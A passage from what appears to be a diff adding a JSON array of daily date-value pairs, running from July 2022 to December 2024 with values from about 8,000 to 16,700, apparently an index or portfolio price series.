9609.410622091735 + ], + [ + "2022-07-29", + 9784.657869989182 + ], + [ + "2022-08-01", + 9778.76310263193 + ], + [ + "2022-08-02", + 9749.60997064437 + ], + [ + "2022-08-03", + 10015.115756992189 + ], + [ + "2022-08-04", + 10061.950284361485 + ], + [ + "2022-08-05", + 9979.754904022064 + ], + [ + "2022-08-08", + 9947.496458198213 + ], + [ + "2022-08-09", + 9834.903882543369 + ], + [ + "2022-08-10", + 10109.406843394712 + ], + [ + "2022-08-11", + 10052.023937948756 + ], + [ + "2022-08-12", + 10247.74300364557 + ], + [ + "2022-08-15", + 10330.559446752248 + ], + [ + "2022-08-16", + 10306.365127936024 + ], + [ + "2022-08-17", + 10188.811801316499 + ], + [ + "2022-08-18", + 10213.315198171344 + ], + [ + "2022-08-19", + 10014.183678392965 + ], + [ + "2022-08-22", + 9750.538173656902 + ], + [ + "2022-08-23", + 9742.475015545948 + ], + [ + "2022-08-24", + 9770.698975624304 + ], + [ + "2022-08-25", + 9943.466816936081 + ], + [ + "2022-08-26", + 9535.9004315272 + ], + [ + "2022-08-29", + 9441.918423163297 + ], + [ + "2022-08-30", + 9336.768911748823 + ], + [ + "2022-08-31", + 9282.488413449139 + ], + [ + "2022-09-01", + 9286.52193029796 + ], + [ + "2022-09-02", + 9155.321694042197 + ], + [ + "2022-09-06", + 9089.564614653322 + ], + [ + "2022-09-07", + 9273.186036493687 + ], + [ + "2022-09-08", + 9321.261720500826 + ], + [ + "2022-09-09", + 9525.043944308594 + ], + [ + "2022-09-12", + 9638.256613834023 + ], + [ + "2022-09-13", + 9109.726385517397 + ], + [ + "2022-09-14", + 9181.994450547418 + ], + [ + "2022-09-15", + 9029.08123985444 + ], + [ + "2022-09-16", + 8973.868662955534 + ], + [ + "2022-09-19", + 9043.753242170491 + ], + [ + "2022-09-20", + 8971.664423024939 + ], + [ + "2022-09-21", + 8811.016510193083 + ], + [ + "2022-09-22", + 8702.573718987798 + ], + [ + "2022-09-23", + 8560.881300662395 + ], + [ + "2022-09-26", + 8525.45746940854 + ], + [ + "2022-09-27", + 8528.876705766816 + ], + [ + "2022-09-28", + 8698.535357655612 + ], + [ + "2022-09-29", + 8447.778116460993 + ], + [ + "2022-09-30", + 8304.529650079092 + ], + [ + "2022-10-03", + 8499.35829973361 + ], + [ + "2022-10-04", + 8766.581939882286 + ], + [ + "2022-10-05", + 8761.922515782842 + ], + [ + "2022-10-06", + 8692.939979370252 + ], + [ + "2022-10-07", + 8361.703273843723 + ], + [ + "2022-10-10", + 8278.118495675524 + ], + [ + "2022-10-11", + 8164.391342016844 + ], + [ + "2022-10-12", + 8161.595106219173 + ], + [ + "2022-10-13", + 8353.003550618747 + ], + [ + "2022-10-14", + 8101.93432469549 + ], + [ + "2022-10-17", + 8369.47188736615 + ], + [ + "2022-10-18", + 8435.65818798107 + ], + [ + "2022-10-19", + 8404.893780826658 + ], + [ + "2022-10-20", + 8362.01428967569 + ], + [ + "2022-10-21", + 8558.08700265807 + ], + [ + "2022-10-24", + 8652.234692353022 + ], + [ + "2022-10-25", + 8831.215099130724 + ], + [ + "2022-10-26", + 8636.076402540912 + ], + [ + "2022-10-27", + 8478.848694964005 + ], + [ + "2022-10-28", + 8738.307597176945 + ], + [ + "2022-10-31", + 8636.698434204844 + ], + [ + "2022-11-01", + 8548.450356350508 + ], + [ + "2022-11-02", + 8255.434686772176 + ], + [ + "2022-11-03", + 8094.1686178630825 + ], + [ + "2022-11-04", + 8224.361201579146 + ], + [ + "2022-11-07", + 8314.784452463895 + ], + [ + "2022-11-08", + 8375.376343690128 + ], + [ + "2022-11-09", + 8182.101804298762 + ], + [ + "2022-11-10", + 8785.846512427359 + ], + [ + "2022-11-11", + 8947.738488587076 + ], + [ + "2022-11-14", + 8869.435166182251 + ], + [ + "2022-11-15", + 8992.174027794545 + ], + [ + "2022-11-16", + 8869.435166182251 + ], + [ + "2022-11-17", + 8849.859577805213 + ], + [ + "2022-11-18", + 8850.168655843832 + ], + [ + "2022-11-21", + 8759.126279985172 + ], + [ + "2022-11-22", + 8885.282440162395 + ], + [ + "2022-11-23", + 8974.461627719282 + ], + [ + "2022-11-25", + 8915.4238467562 + ], + [ + "2022-11-28", + 8784.605355789516 + ], + [ + "2022-11-29", + 8718.111914929323 + ], + [ + "2022-11-30", + 9115.530076587407 + ], + [ + "2022-12-01", + 9126.717926468105 + ], + [ + "2022-12-02", + 9090.362016615029 + ], + [ + "2022-12-05", + 8937.794702034238 + ], + [ + "2022-12-06", + 8752.601729790607 + ], + [ + "2022-12-07", + 8716.86785160146 + ], + [ + "2022-12-08", + 8820.027249250026 + ], + [ + "2022-12-09", + 8763.785704084616 + ], + [ + "2022-12-12", + 8873.787450036421 + ], + [ + "2022-12-13", + 8969.179203059233 + ], + [ + "2022-12-14", + 8902.68285550902 + ], + [ + "2022-12-15", + 8603.760791813365 + ], + [ + "2022-12-16", + 8521.729155011648 + ], + [ + "2022-12-19", + 8401.968681771508 + ], + [ + "2022-12-20", + 8395.427660333506 + ], + [ + "2022-12-21", + 8517.214096516449 + ], + [ + "2022-12-22", + 8308.838333582986 + ], + [ + "2022-12-23", + 8327.524474814403 + ], + [ + "2022-12-27", + 8209.78802672372 + ], + [ + "2022-12-28", + 8101.3965870420925 + ], + [ + "2022-12-29", + 8298.872262406674 + ], + [ + "2022-12-30", + 8293.887289025171 + ], + [ + "2023-01-03", + 8237.823051950883 + ], + [ + "2023-01-04", + 8277.066273888875 + ], + [ + "2023-01-05", + 8147.494752940069 + ], + [ + "2023-01-06", + 8372.378577384517 + ], + [ + "2023-01-09", + 8426.57575057034 + ], + [ + "2023-01-10", + 8497.900110241064 + ], + [ + "2023-01-11", + 8644.91564688677 + ], + [ + "2023-01-12", + 8691.63681334535 + ], + [ + "2023-01-13", + 8751.440991576606 + ], + [ + "2023-01-17", + 8769.196023105473 + ], + [ + "2023-01-18", + 8655.195640585067 + ], + [ + "2023-01-19", + 8570.163330787718 + ], + [ + "2023-01-20", + 8804.702210576515 + ], + [ + "2023-01-23", + 9000.305977569267 + ], + [ + "2023-01-24", + 8981.928914376469 + ], + [ + "2023-01-25", + 8961.995803127173 + ], + [ + "2023-01-26", + 9136.730504684712 + ], + [ + "2023-01-27", + 9227.682773152803 + ], + [ + "2023-01-30", + 9041.108154253776 + ], + [ + "2023-01-31", + 9176.600602769999 + ], + [ + "2023-02-01", + 9372.827370323354 + ], + [ + "2023-02-02", + 9709.216668355777 + ], + [ + "2023-02-03", + 9536.661984312013 + ], + [ + "2023-02-06", + 9455.990678438891 + ], + [ + "2023-02-07", + 9651.905461263608 + ], + [ + "2023-02-08", + 9480.284793612413 + ], + [ + "2023-02-09", + 9396.499453832945 + ], + [ + "2023-02-10", + 9334.83014950657 + ], + [ + "2023-02-13", + 9484.333812808 + ], + [ + "2023-02-14", + 9554.416046944207 + ], + [ + "2023-02-15", + 9627.612314986758 + ], + [ + "2023-02-16", + 9446.95959255182 + ], + [ + "2023-02-17", + 9380.302408153924 + ], + [ + "2023-02-21", + 9158.222570680527 + ], + [ + "2023-02-22", + 9165.074607950495 + ], + [ + "2023-02-23", + 9245.124851056358 + ], + [ + "2023-02-24", + 9090.322291851444 + ], + [ + "2023-02-27", + 9155.418583709476 + ], + [ + "2023-02-28", + 9143.584479748024 + ], + [ + "2023-03-01", + 9070.076226976835 + ], + [ + "2023-03-02", + 9145.140527804524 + ], + [ + "2023-03-03", + 9334.207148945967 + ], + [ + "2023-03-06", + 9344.794282889537 + ], + [ + "2023-03-07", + 9230.17574429189 + ], + [ + "2023-03-08", + 9276.272941293195 + ], + [ + "2023-03-09", + 9115.550423417535 + ], + [ + "2023-03-10", + 8987.534950525229 + ], + [ + "2023-03-13", + 9054.19019712978 + ], + [ + "2023-03-14", + 9262.253975334603 + ], + [ + "2023-03-15", + 9310.843174578322 + ], + [ + "2023-03-16", + 9556.285048626018 + ], + [ + "2023-03-17", + 9511.12089912061 + ], + [ + "2023-03-20", + 9544.87532140725 + ], + [ + "2023-03-21", + 9681.198114372051 + ], + [ + "2023-03-22", + 9549.556061233494 + ], + [ + "2023-03-23", + 9662.794890969088 + ], + [ + "2023-03-24", + 9698.358243343826 + ], + [ + "2023-03-27", + 9631.911309523925 + ], + [ + "2023-03-28", + 9580.750658510624 + ], + [ + "2023-03-29", + 9755.445635304579 + ], + [ + "2023-03-30", + 9847.78342601476 + ], + [ + "2023-03-31", + 10011.560875099723 + ], + [ + "2023-04-03", + 9987.227035162618 + ], + [ + "2023-04-04", + 9953.535591159709 + ], + [ + "2023-04-05", + 9855.270090605403 + ], + [ + "2023-04-06", + 9921.715086631959 + ], + [ + "2023-04-10", + 9916.100330413143 + ], + [ + "2023-04-11", + 9852.46222804766 + ], + [ + "2023-04-12", + 9765.428177724329 + ], + [ + "2023-04-13", + 9956.656407342763 + ], + [ + "2023-04-14", + 9937.937323624472 + ], + [ + "2023-04-17", + 9946.35994240103 + ], + [ + "2023-04-18", + 9946.983911858308 + ], + [ + "2023-04-19", + 9942.30607872208 + ], + [ + "2023-04-20", + 9866.500571939707 + ], + [ + "2023-04-21", + 9876.794130191422 + ], + [ + "2023-04-24", + 9856.205075894646 + ], + [ + "2023-04-25", + 9670.28058666306 + ], + [ + "2023-04-26", + 9728.929840060351 + ], + [ + "2023-04-27", + 9993.467698632054 + ], + [ + "2023-04-28", + 10062.40760359104 + ], + [ + "2023-05-01", + 10050.8651375281 + ], + [ + "2023-05-02", + 9963.20614885082 + ], + [ + "2023-05-03", + 9898.008122842146 + ], + [ + "2023-05-04", + 9863.070677718031 + ], + [ + "2023-05-05", + 10072.70213073943 + ], + [ + "2023-05-08", + 10097.658971237139 + ], + [ + "2023-05-09", + 10033.708884143018 + ], + [ + "2023-05-10", + 10142.892881302987 + ], + [ + "2023-05-11", + 10175.959386951947 + ], + [ + "2023-05-12", + 10139.460080391294 + ], + [ + "2023-05-15", + 10194.3664859416 + ], + [ + "2023-05-16", + 10205.906045314523 + ], + [ + "2023-05-17", + 10329.44133999185 + ], + [ + "2023-05-18", + 10521.291601274215 + ], + [ + "2023-05-19", + 10497.583668587731 + ], + [ + "2023-05-22", + 10532.837942923847 + ], + [ + "2023-05-23", + 10399.317199136753 + ], + [ + "2023-05-24", + 10345.973623919655 + ], + [ + "2023-05-25", + 10597.72301530721 + ], + [ + "2023-05-26", + 10868.499599555005 + ], + [ + "2023-05-30", + 10917.788342196478 + ], + [ + "2023-05-31", + 10855.710163474185 + ], + [ + "2023-06-01", + 10981.115428729996 + ], + [ + "2023-06-02", + 11063.469708123754 + ], + [ + "2023-06-05", + 11071.268357443036 + ], + [ + "2023-06-06", + 11069.396449071206 + ], + [ + "2023-06-07", + 10881.60295815781 + ], + [ + "2023-06-08", + 11016.67781220806 + ], + [ + "2023-06-09", + 11058.790906090853 + ], + [ + "2023-06-12", + 11245.651349508353 + ], + [ + "2023-06-13", + 11332.061430374406 + ], + [ + "2023-06-14", + 11414.416678664837 + ], + [ + "2023-06-15", + 11550.432331384365 + ], + [ + "2023-06-16", + 11477.746671888373 + ], + [ + "2023-06-20", + 11461.315153214538 + ], + [ + "2023-06-21", + 11305.12610287086 + ], + [ + "2023-06-22", + 11438.512170020438 + ], + [ + "2023-06-23", + 11325.116379023852 + ], + [ + "2023-06-26", + 11173.298021571129 + ], + [ + "2023-06-27", + 11365.411822748492 + ], + [ + "2023-06-28", + 11387.591805381988 + ], + [ + "2023-06-29", + 11364.786884394543 + ], + [ + "2023-06-30", + 11540.036070085334 + ], + [ + "2023-07-03", + 11567.211683963733 + ], + [ + "2023-07-05", + 11566.899699235095 + ], + [ + "2023-07-06", + 11478.806644848406 + ], + [ + "2023-07-07", + 11440.697032017579 + ], + [ + "2023-07-10", + 11444.443755451255 + ], + [ + "2023-07-11", + 11500.988565275247 + ], + [ + "2023-07-12", + 11646.246523356514 + ], + [ + "2023-07-13", + 11843.981863029403 + ], + [ + "2023-07-14", + 11841.485016303624 + ], + [ + "2023-07-17", + 11952.06713136243 + ], + [ + "2023-07-18", + 12049.842370200304 + ], + [ + "2023-07-19", + 12047.031600952541 + ], + [ + "2023-07-20", + 11769.323529907611 + ], + [ + "2023-07-21", + 11734.024686324547 + ], + [ + "2023-07-24", + 11752.767992459658 + ], + [ + "2023-07-25", + 11832.425832413042 + ], + [ + "2023-07-26", + 11793.065373977644 + ], + [ + "2023-07-27", + 11764.94993032664 + ], + [ + "2023-07-28", + 11979.245651930847 + ], + [ + "2023-07-31", + 11985.492128780319 + ], + [ + "2023-08-01", + 11957.690607651299 + ], + [ + "2023-08-02", + 11695.29013513977 + ], + [ + "2023-08-03", + 11676.545860107986 + ], + [ + "2023-08-04", + 11621.87877203586 + ], + [ + "2023-08-07", + 11720.27798033101 + ], + [ + "2023-08-08", + 11620.630833121306 + ], + [ + "2023-08-09", + 11492.864366673908 + ], + [ + "2023-08-10", + 11514.107426224817 + ], + [ + "2023-08-11", + 11440.697032017579 + ], + [ + "2023-08-14", + 11569.086499025581 + ], + [ + "2023-08-15", + 11446.32147720312 + ], + [ + "2023-08-16", + 11325.116379023852 + ], + [ + "2023-08-17", + 11201.41249632546 + ], + [ + "2023-08-18", + 11187.35574339663 + ], + [ + "2023-08-21", + 11367.601529228996 + ], + [ + "2023-08-22", + 11351.356038716336 + ], + [ + "2023-08-23", + 11530.35001004746 + ], + [ + "2023-08-24", + 11283.881105526605 + ], + [ + "2023-08-25", + 11371.348252662674 + ], + [ + "2023-08-28", + 11456.940584736893 + ], + [ + "2023-08-29", + 11707.158150484767 + ], + [ + "2023-08-30", + 11772.448221677358 + ], + [ + "2023-08-31", + 11807.748034157095 + ], + [ + "2023-09-01", + 11795.251204871458 + ], + [ + "2023-09-05", + 11810.245849779547 + ], + [ + "2023-09-06", + 11706.223165195526 + ], + [ + "2023-09-07", + 11622.503710389808 + ], + [ + "2023-09-08", + 11638.747263109124 + ], + [ + "2023-09-11", + 11775.881991485723 + ], + [ + "2023-09-12", + 11645.307662480582 + ], + [ + "2023-09-13", + 11689.66375216088 + ], + [ + "2023-09-14", + 11785.255097898289 + ], + [ + "2023-09-15", + 11583.456205579721 + ], + [ + "2023-09-18", + 11595.530595916023 + ], + [ + "2023-09-19", + 11570.817917379856 + ], + [ + "2023-09-20", + 11404.076613372828 + ], + [ + "2023-09-21", + 11195.102072295582 + ], + [ + "2023-09-22", + 11196.668778215482 + ], + [ + "2023-09-25", + 11249.848609894876 + ], + [ + "2023-09-26", + 11080.918568304018 + ], + [ + "2023-09-27", + 11106.882092444757 + ], + [ + "2023-09-28", + 11199.796376675247 + ], + [ + "2023-09-29", + 11207.929295346641 + ], + [ + "2023-10-02", + 11301.467549034407 + ], + [ + "2023-10-03", + 11103.13149342439 + ], + [ + "2023-10-04", + 11254.228991752558 + ], + [ + "2023-10-05", + 11221.068503126338 + ], + [ + "2023-10-06", + 11409.082902481132 + ], + [ + "2023-10-09", + 11467.26902326883 + ], + [ + "2023-10-10", + 11530.773417893468 + ], + [ + "2023-10-11", + 11613.050185553402 + ], + [ + "2023-10-12", + 11572.693701338376 + ], + [ + "2023-10-13", + 11427.225492679114 + ], + [ + "2023-10-16", + 11556.426895098914 + ], + [ + "2023-10-17", + 11518.575008783047 + ], + [ + "2023-10-18", + 11367.476541558206 + ], + [ + "2023-10-19", + 11261.11106481938 + ], + [ + "2023-10-20", + 11093.119884104455 + ], + [ + "2023-10-23", + 11126.592357459313 + ], + [ + "2023-10-24", + 11234.83361815666 + ], + [ + "2023-10-25", + 10959.852022348958 + ], + [ + "2023-10-26", + 10750.877481271711 + ], + [ + "2023-10-27", + 10802.498358204588 + ], + [ + "2023-10-30", + 10924.187904720251 + ], + [ + "2023-10-31", + 10976.430813317058 + ], + [ + "2023-11-01", + 11166.947872777666 + ], + [ + "2023-11-02", + 11369.664310245365 + ], + [ + "2023-11-03", + 11503.245125626174 + ], + [ + "2023-11-06", + 11550.170729282712 + ], + [ + "2023-11-07", + 11659.350850855992 + ], + [ + "2023-11-08", + 11666.858831173437 + ], + [ + "2023-11-09", + 11577.076020989402 + ], + [ + "2023-11-10", + 11837.35364089085 + ], + [ + "2023-11-13", + 11800.4377087609 + ], + [ + "2023-11-14", + 12054.461100639492 + ], + [ + "2023-11-15", + 12063.533849083491 + ], + [ + "2023-11-16", + 12073.85647423539 + ], + [ + "2023-11-17", + 12076.671119069844 + ], + [ + "2023-11-20", + 12223.703126958988 + ], + [ + "2023-11-21", + 12152.690752016904 + ], + [ + "2023-11-22", + 12202.431969404568 + ], + [ + "2023-11-24", + 12185.224364495827 + ], + [ + "2023-11-27", + 12174.588785718619 + ], + [ + "2023-11-28", + 12206.498428740266 + ], + [ + "2023-11-29", + 12194.609097668466 + ], + [ + "2023-11-30", + 12163.952238044736 + ], + [ + "2023-12-01", + 12198.67749479751 + ], + [ + "2023-12-04", + 12085.431882785206 + ], + [ + "2023-12-05", + 12115.775788783625 + ], + [ + "2023-12-06", + 12045.699368027455 + ], + [ + "2023-12-07", + 12214.00640905771 + ], + [ + "2023-12-08", + 12268.439993031696 + ], + [ + "2023-12-11", + 12373.237794953948 + ], + [ + "2023-12-12", + 12471.781368853344 + ], + [ + "2023-12-13", + 12630.389754188976 + ], + [ + "2023-12-14", + 12619.441221786456 + ], + [ + "2023-12-15", + 12680.441987408607 + ], + [ + "2023-12-18", + 12760.312984630005 + ], + [ + "2023-12-19", + 12825.51101063868 + ], + [ + "2023-12-20", + 12634.928066204322 + ], + [ + "2023-12-21", + 12781.941665056684 + ], + [ + "2023-12-22", + 12801.060903100837 + ], + [ + "2023-12-26", + 12879.42623489272 + ], + [ + "2023-12-27", + 12905.644578858404 + ], + [ + "2023-12-28", + 12899.372910695438 + ], + [ + "2023-12-29", + 12843.546053305981 + ], + [ + "2024-01-02", + 12626.207027252543 + ], + [ + "2024-01-03", + 12492.601989454915 + ], + [ + "2024-01-04", + 12428.310850731972 + ], + [ + "2024-01-05", + 12443.049706918446 + ], + [ + "2024-01-08", + 12700.222981880275 + ], + [ + "2024-01-09", + 12725.31256122216 + ], + [ + "2024-01-10", + 12811.558898550511 + ], + [ + "2024-01-11", + 12838.216152708967 + ], + [ + "2024-01-12", + 12844.80271229059 + ], + [ + "2024-01-16", + 12843.546053305981 + ], + [ + "2024-01-17", + 12771.099711288169 + ], + [ + "2024-01-18", + 12952.375434283711 + ], + [ + "2024-01-19", + 13209.234786723558 + ], + [ + "2024-01-22", + 13226.483085292555 + ], + [ + "2024-01-23", + 13281.369144012731 + ], + [ + "2024-01-24", + 13355.069238325133 + ], + [ + "2024-01-25", + 13371.379644914872 + ], + [ + "2024-01-26", + 13291.717929374796 + ], + [ + "2024-01-29", + 13427.830471761603 + ], + [ + "2024-01-30", + 13338.447815903432 + ], + [ + "2024-01-31", + 13077.197423742504 + ], + [ + "2024-02-01", + 13231.189016432294 + ], + [ + "2024-02-02", + 13454.802617338715 + ], + [ + "2024-02-05", + 13437.241365144408 + ], + [ + "2024-02-06", + 13410.26728177395 + ], + [ + "2024-02-07", + 13548.261421499314 + ], + [ + "2024-02-08", + 13573.353907531215 + ], + [ + "2024-02-09", + 13706.956038638824 + ], + [ + "2024-02-12", + 13653.326638903256 + ], + [ + "2024-02-13", + 13440.376714777554 + ], + [ + "2024-02-14", + 13586.839011423099 + ], + [ + "2024-02-15", + 13627.296260892093 + ], + [ + "2024-02-16", + 13503.728992624565 + ], + [ + "2024-02-20", + 13401.800093750442 + ], + [ + "2024-02-21", + 13348.168756221528 + ], + [ + "2024-02-22", + 13738.948037877659 + ], + [ + "2024-02-23", + 13698.487881718644 + ], + [ + "2024-02-26", + 13691.2754148864 + ], + [ + "2024-02-27", + 13724.205306104495 + ], + [ + "2024-02-28", + 13651.131119042715 + ], + [ + "2024-02-29", + 13768.11473441864 + ], + [ + "2024-03-01", + 13975.417928735324 + ], + [ + "2024-03-04", + 13925.552692573543 + ], + [ + "2024-03-05", + 13675.594791133975 + ], + [ + "2024-03-06", + 13761.528174837016 + ], + [ + "2024-03-07", + 13970.401950660293 + ], + [ + "2024-03-08", + 13768.740641669261 + ], + [ + "2024-03-11", + 13717.620684316218 + ], + [ + "2024-03-12", + 13914.262139645527 + ], + [ + "2024-03-13", + 13807.314356006355 + ], + [ + "2024-03-14", + 13772.504805243048 + ], + [ + "2024-03-15", + 13608.792272235161 + ], + [ + "2024-03-18", + 13738.585670522036 + ], + [ + "2024-03-19", + 13772.815821075013 + ], + [ + "2024-03-20", + 13936.114635203621 + ], + [ + "2024-03-21", + 14002.063556133708 + ], + [ + "2024-03-22", + 14018.081355928261 + ], + [ + "2024-03-25", + 13967.20556053676 + ], + [ + "2024-03-26", + 13921.982308334314 + ], + [ + "2024-03-27", + 13969.401080397301 + ], + [ + "2024-03-28", + 13943.652651317921 + ], + [ + "2024-04-01", + 13973.17299514447 + ], + [ + "2024-04-02", + 13852.580239662406 + ], + [ + "2024-04-03", + 13883.671164995547 + ], + [ + "2024-04-04", + 13671.380090607341 + ], + [ + "2024-04-05", + 13832.480478185389 + ], + [ + "2024-04-08", + 13836.565346557869 + ], + [ + "2024-04-09", + 13887.75409557468 + ], + [ + "2024-04-10", + 13766.533495048647 + ], + [ + "2024-04-11", + 13986.361616654482 + ], + [ + "2024-04-12", + 13763.39426982881 + ], + [ + "2024-04-15", + 13536.97183746797 + ], + [ + "2024-04-16", + 13538.227527555906 + ], + [ + "2024-04-17", + 13373.042271605378 + ], + [ + "2024-04-18", + 13296.730031863135 + ], + [ + "2024-04-19", + 13021.634106248046 + ], + [ + "2024-04-22", + 13152.58727385225 + ], + [ + "2024-04-23", + 13348.862486239244 + ], + [ + "2024-04-24", + 13394.08476954502 + ], + [ + "2024-04-25", + 13329.393476496214 + ], + [ + "2024-04-26", + 13535.087333439395 + ], + [ + "2024-04-29", + 13590.044121616686 + ], + [ + "2024-04-30", + 13333.788391803986 + ], + [ + "2024-05-01", + 13237.378328378072 + ], + [ + "2024-05-02", + 13406.330654592406 + ], + [ + "2024-05-03", + 13675.776943708459 + ], + [ + "2024-05-06", + 13825.572244908399 + ], + [ + "2024-05-07", + 13827.772609252304 + ], + [ + "2024-05-08", + 13819.606748094035 + ], + [ + "2024-05-09", + 13849.754936964551 + ], + [ + "2024-05-10", + 13882.414506010939 + ], + [ + "2024-05-13", + 13914.44719891003 + ], + [ + "2024-05-14", + 14003.947091265609 + ], + [ + "2024-05-15", + 14222.833445305492 + ], + [ + "2024-05-16", + 14193.941915419584 + ], + [ + "2024-05-17", + 14187.03174434925 + ], + [ + "2024-05-20", + 14285.956094641051 + ], + [ + "2024-05-21", + 14313.903919167664 + ], + [ + "2024-05-22", + 14311.07861646981 + ], + [ + "2024-05-23", + 14246.700277046315 + ], + [ + "2024-05-24", + 14381.42245270767 + ], + [ + "2024-05-28", + 14435.75042694432 + ], + [ + "2024-05-29", + 14334.002711748008 + ], + [ + "2024-05-30", + 14180.436464697572 + ], + [ + "2024-05-31", + 14154.058252780878 + ], + [ + "2024-06-03", + 14230.056570001138 + ], + [ + "2024-06-04", + 14268.997496177219 + ], + [ + "2024-06-05", + 14556.657104948368 + ], + [ + "2024-06-06", + 14551.633375699956 + ], + [ + "2024-06-07", + 14538.756738918584 + ], + [ + "2024-06-10", + 14597.481566256352 + ], + [ + "2024-06-11", + 14697.659668842743 + ], + [ + "2024-06-12", + 14890.165873172587 + ], + [ + "2024-06-13", + 14970.873997119277 + ], + [ + "2024-06-14", + 15048.441926949454 + ], + [ + "2024-06-17", + 15232.782270121028 + ], + [ + "2024-06-18", + 15237.494014640804 + ], + [ + "2024-06-20", + 15120.043391068593 + ], + [ + "2024-06-21", + 15079.531883385922 + ], + [ + "2024-06-24", + 14907.855988624378 + ], + [ + "2024-06-25", + 15078.3362648917 + ], + [ + "2024-06-26", + 15109.476603955152 + ], + [ + "2024-06-27", + 15148.478570621619 + ], + [ + "2024-06-28", + 15069.8438855547 + ], + [ + "2024-07-01", + 15158.230515633244 + ], + [ + "2024-07-02", + 15317.386327589003 + ], + [ + "2024-07-03", + 15445.088846855999 + ], + [ + "2024-07-05", + 15606.133038427024 + ], + [ + "2024-07-08", + 15643.246625478223 + ], + [ + "2024-07-09", + 15656.772423030365 + ], + [ + "2024-07-10", + 15820.016978945294 + ], + [ + "2024-07-11", + 15473.083178422903 + ], + [ + "2024-07-12", + 15563.984095367337 + ], + [ + "2024-07-15", + 15605.816209215021 + ], + [ + "2024-07-16", + 15611.792363892786 + ], + [ + "2024-07-17", + 15153.511019940088 + ], + [ + "2024-07-18", + 15081.795226013557 + ], + [ + "2024-07-19", + 14948.11752096547 + ], + [ + "2024-07-22", + 15170.812607826088 + ], + [ + "2024-07-23", + 15117.339200454839 + ], + [ + "2024-07-24", + 14575.074861801422 + ], + [ + "2024-07-25", + 14414.34459275238 + ], + [ + "2024-07-26", + 14562.180784879942 + ], + [ + "2024-07-29", + 14591.430806534781 + ], + [ + "2024-07-30", + 14391.070725775306 + ], + [ + "2024-07-31", + 14816.955071679944 + ], + [ + "2024-08-01", + 14458.067992905351 + ], + [ + "2024-08-02", + 14114.90610713013 + ], + [ + "2024-08-05", + 13694.05421054396 + ], + [ + "2024-08-06", + 13824.900799514156 + ], + [ + "2024-08-07", + 13675.181072254694 + ], + [ + "2024-08-08", + 14093.51674418163 + ], + [ + "2024-08-09", + 14167.119948826754 + ], + [ + "2024-08-12", + 14197.62953615622 + ], + [ + "2024-08-13", + 14549.911646312408 + ], + [ + "2024-08-14", + 14554.63211090224 + ], + [ + "2024-08-15", + 14922.325491535816 + ], + [ + "2024-08-16", + 14941.511583450392 + ], + [ + "2024-08-19", + 15137.78388914737 + ], + [ + "2024-08-20", + 15106.015705039948 + ], + [ + "2024-08-21", + 15176.471933291852 + ], + [ + "2024-08-22", + 14935.852257984629 + ], + [ + "2024-08-23", + 15097.839186018278 + ], + [ + "2024-08-26", + 14951.263528462017 + ], + [ + "2024-08-27", + 14995.92869618094 + ], + [ + "2024-08-28", + 14825.7623424356 + ], + [ + "2024-08-29", + 14804.06002586179 + ], + [ + "2024-08-30", + 14980.515487910205 + ], + [ + "2024-09-03", + 14525.694073976036 + ], + [ + "2024-09-04", + 14487.947797397504 + ], + [ + "2024-09-05", + 14501.47456384632 + ], + [ + "2024-09-06", + 14113.018696411536 + ], + [ + "2024-09-09", + 14294.50660777842 + ], + [ + "2024-09-10", + 14426.612762423241 + ], + [ + "2024-09-11", + 14739.892905912964 + ], + [ + "2024-09-12", + 14884.583090543976 + ], + [ + "2024-09-13", + 14951.263528462017 + ], + [ + "2024-09-16", + 14885.210935587944 + ], + [ + "2024-09-17", + 14893.074500984301 + ], + [ + "2024-09-18", + 14828.593458513491 + ], + [ + "2024-09-19", + 15203.521590602788 + ], + [ + "2024-09-20", + 15174.584522573257 + ], + [ + "2024-09-23", + 15214.809236840785 + ], + [ + "2024-09-24", + 15288.199284217893 + ], + [ + "2024-09-25", + 15302.37327364413 + ], + [ + "2024-09-26", + 15417.34061504398 + ], + [ + "2024-09-27", + 15331.666895649247 + ], + [ + "2024-09-30", + 15373.243220775315 + ], + [ + "2024-10-01", + 15159.056015598462 + ], + [ + "2024-10-02", + 15180.47638324049 + ], + [ + "2024-10-03", + 15169.136416582163 + ], + [ + "2024-10-04", + 15349.619582099363 + ], + [ + "2024-10-07", + 15185.200723417012 + ], + [ + "2024-10-08", + 15411.985523133473 + ], + [ + "2024-10-09", + 15533.253599596474 + ], + [ + "2024-10-10", + 15515.615804565015 + ], + [ + "2024-10-11", + 15539.867288284935 + ], + [ + "2024-10-14", + 15670.270122578993 + ], + [ + "2024-10-15", + 15460.808226475334 + ], + [ + "2024-10-16", + 15462.698543883946 + ], + [ + "2024-10-17", + 15473.407758808287 + ], + [ + "2024-10-18", + 15574.830893619215 + ], + [ + "2024-10-21", + 15604.754298461645 + ], + [ + "2024-10-22", + 15621.76231065579 + ], + [ + "2024-10-23", + 15382.3770097097 + ], + [ + "2024-10-24", + 15507.11082957127 + ], + [ + "2024-10-25", + 15601.603446481733 + ], + [ + "2024-10-28", + 15604.124515624331 + ], + [ + "2024-10-29", + 15754.054493461788 + ], + [ + "2024-10-30", + 15634.993563619402 + ], + [ + "2024-10-31", + 15240.322224028676 + ], + [ + "2024-11-01", + 15353.084356601257 + ], + [ + "2024-11-04", + 15308.358148391952 + ], + [ + "2024-11-05", + 15503.6450861727 + ], + [ + "2024-11-06", + 15924.774087207288 + ], + [ + "2024-11-07", + 16175.495479225014 + ], + [ + "2024-11-08", + 16194.39671551779 + ], + [ + "2024-11-11", + 16184.948035164749 + ], + [ + "2024-11-12", + 16155.65344426296 + ], + [ + "2024-11-13", + 16134.865766148261 + ], + [ + "2024-11-14", + 16022.733416412993 + ], + [ + "2024-11-15", + 15640.97746947055 + ], + [ + "2024-11-18", + 15749.645044703924 + ], + [ + "2024-11-19", + 15857.998697415313 + ], + [ + "2024-11-20", + 15848.863939584255 + ], + [ + "2024-11-21", + 15905.874788707859 + ], + [ + "2024-11-22", + 15931.388744792423 + ], + [ + "2024-11-25", + 15956.585871664985 + ], + [ + "2024-11-26", + 16042.260559956392 + ], + [ + "2024-11-27", + 15915.954220794887 + ], + [ + "2024-11-29", + 16055.804766545316 + ], + [ + "2024-12-02", + 16230.617948733352 + ], + [ + "2024-12-03", + 16280.386295227854 + ], + [ + "2024-12-04", + 16481.661014446443 + ], + [ + "2024-12-05", + 16435.98722529115 + ], + [ + "2024-12-06", + 16583.08124256735 + ], + [ + "2024-12-09", + 16453.93894284459 + ], + [ + "2024-12-10", + 16397.874705770304 + ], + [ + "2024-12-11", + 16691.43489527874 + ], + [ + "2024-12-12", + 16583.714900991356 + ], + [ + "2024-12-13", + 16710.651991886847 + ], + [ + "2024-12-16", 